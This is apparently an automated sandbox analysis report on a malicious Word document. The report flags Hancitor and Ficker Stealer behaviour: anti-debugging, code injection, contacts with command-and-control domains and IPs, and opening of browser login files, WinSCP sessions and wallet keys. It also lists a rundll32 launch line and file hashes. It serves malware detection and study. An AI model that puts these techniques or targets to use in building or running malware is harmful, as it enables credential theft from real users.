Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: 0708_3355614568218.doc

Stream path 'Data' entropy: 7.97264179911 (max. 8.0)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\svchost.exe TID: 2976

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

3_2_02113400

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0212B328

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

3_2_02113580

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214E556 mov eax, dword ptr fs:[00000030h]	3_2_0214E556
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214E485 mov eax, dword ptr fs:[00000030h]	3_2_0214E485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214E08C push dword ptr fs:[00000030h]	3_2_0214E08C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02111390 GetProcessHeap,RtlAllocateHeap,

3_2_02111390

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0212B328
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02129B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02129B44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0212E1A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02133668 SetUnhandledExceptionFilter,__encode_pointer,	3_2_02133668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213368A __decode_pointer,SetUnhandledExceptionFilter,	3_2_0213368A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040115C SetUnhandledExceptionFilter,exit,	5_2_0040115C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00401150 SetUnhandledExceptionFilter,	5_2_00401150
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004013C9 SetUnhandledExceptionFilter,	5_2_004013C9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pospvisis.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 50.19.92.227 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.222.42.67 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 8.211.241.0 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: sudepallon.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: srand04rf.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.21.211.162 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 95.213.179.67 80	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,

3_2_02113880

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe			Jump to behavior

Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02138BC2 cpuid

3_2_02138BC2

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	3_2_021319B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	3_2_0212D3FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	3_2_02139827
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_02131852
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02131911
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02131976
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_02139964
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	3_2_02131610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_0213660A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_021306AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,	3_2_021397EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_02131498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,	3_2_021364A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	3_2_02130D07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	3_2_0213157A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa,	5_2_00415800

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\SysWOW64\svchost.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02135256 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_02135256

Source: C:\Windows\SysWOW64\svchost.exe

5_2_00415800

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02111AA0 GetVersion,wsprintfA,wsprintfA,

3_2_02111AA0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ficker Stealer

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Jump to behavior

Remote Access Functionality:

Yara detected Ficker Stealer

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY

Yara detected Hancitor

Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY

ID:	446230
Product:	CloudBasic
Start time:	03:06:14
Start date:	09.07.2021
Sample:	0708_3355614568218.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	992338b40b38f1f55bd4a9599f70771c
SHA1:	866086438592043aebb88f3da34ad437681a5cb0
SHA256:	b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699
Filetype:	Microsoft Word document (32009/1) 54.23%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\kaosdma.txt	ASCII text, with no line terminators	A1924933759C1451D5C265A1AAE417BB	51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF	14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\VFZ0HUO0.txt	ASCII text, with no line terminators	A1924933759C1451D5C265A1AAE417BB	51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF	14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2581227F.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	800D9DB0CFC1190FBBBFCF148131457F	6D6F11B7EE5C393FA5EEA1BC6BB9B68D286EE4F0	9A19C18847D04C7846F85CA1D6EFFEE7B818F6425420B659A4C54807BF537734
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE9CCB3-349E-46EF-BF24-C3A751787722}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_colorschememapping.xml	XML 1.0 document, ASCII text, with CRLF line terminators	6B7A472A22FBDBFF4B2B08DDB4F43735	C6DF700168D3F5A90FF2713B78F8EF1446927102	65F3CDBC4390C81B94FA960B7362917443FC1E6A51E3F81E4CB4C4DFA09DA4BE
C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_image001.emz	gzip compressed data, max speed, from NTFS filesystem (NT)	3049B0E9ECD3E912A6CBD088FD32269A	CA30E103EA5FAA3B064CBE7E2E751B0FB7AA0B62	36D9FBA23F7F6B2A2411C474700FE8FAC7FE81818D991D36A67BE35C87FA8035
C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_image002.png	PNG image data, 1 x 1, 1-bit grayscale, non-interlaced	9B1C100EED15C0F0598CF0053EBDEFF2	3CFBD2B4EEDDBF0594741263616BE31C72626E4F	75209454F9B87D0147B39F1324810F5719C35454ED8C296C7BDF1BF9B9A919A3
C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_themedata.thmx	Microsoft OOXML	2B26E4DD316F857EBB6E2B6B0E1E0282	581AE91D57A710CF31348CD5F5AB6FD1B081291E	40BB5B5897D76A8EEFB7136E658BDDAA65F094C9689B931A78A01601F9EE02CB
C:\Users\user\AppData\Local\Temp\nimb.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D62F5A4DC678BCCD781C791444F48219	F3BD45BFACF633F790B79DC3561A5C2807F755E0	41C004D250049F7ABDD2207A80FE2B400055BE29F43B7273F58F20AB24C33E29
C:\Users\user\AppData\Local\Temp\nimb.dll:Zone.Identifier	ASCII text, with CRLF line terminators	7D1929A78622DDCF7667E996D1C9204C	685EC20FDB904680E30553B957DDB6C69E9AEE7C	B9A656B09CD4C161C1C09E796593BFBC061E67DF497310556FC8DB1D22111ABA
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0708_3355614568218.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Fri Jul 9 09:06:34 2021, length=900096, window=hide	B8638794C673AA6CAAD32CDC0FD26972	67EFF931986467D960E46C129DC386F8426C87CF	236AAB703C400AC7512D7856D26AFC03DD54C977F3B6C018F05251DEF244F860
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	3ECD47D2F7A8A0522CBA7C63530AAB6B	D5B85BBF70DB601A62751D246B4E900C7DDB2CC8	76B4AF574873D2EBB80D68F5AAC825B6F8A15ACF2A799D2612A4E5782154C78F
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	390880DCFAA790037FA37F50A7080387	760940B899B1DC961633242DB5FF170A0522B0A5	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
C:\Users\user\Desktop\~$08_3355614568218.doc	data	390880DCFAA790037FA37F50A7080387	760940B899B1DC961633242DB5FF170A0522B0A5	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391

Windows Analysis Report 0708_3355614568218.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Location Tracking:

Cryptography:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs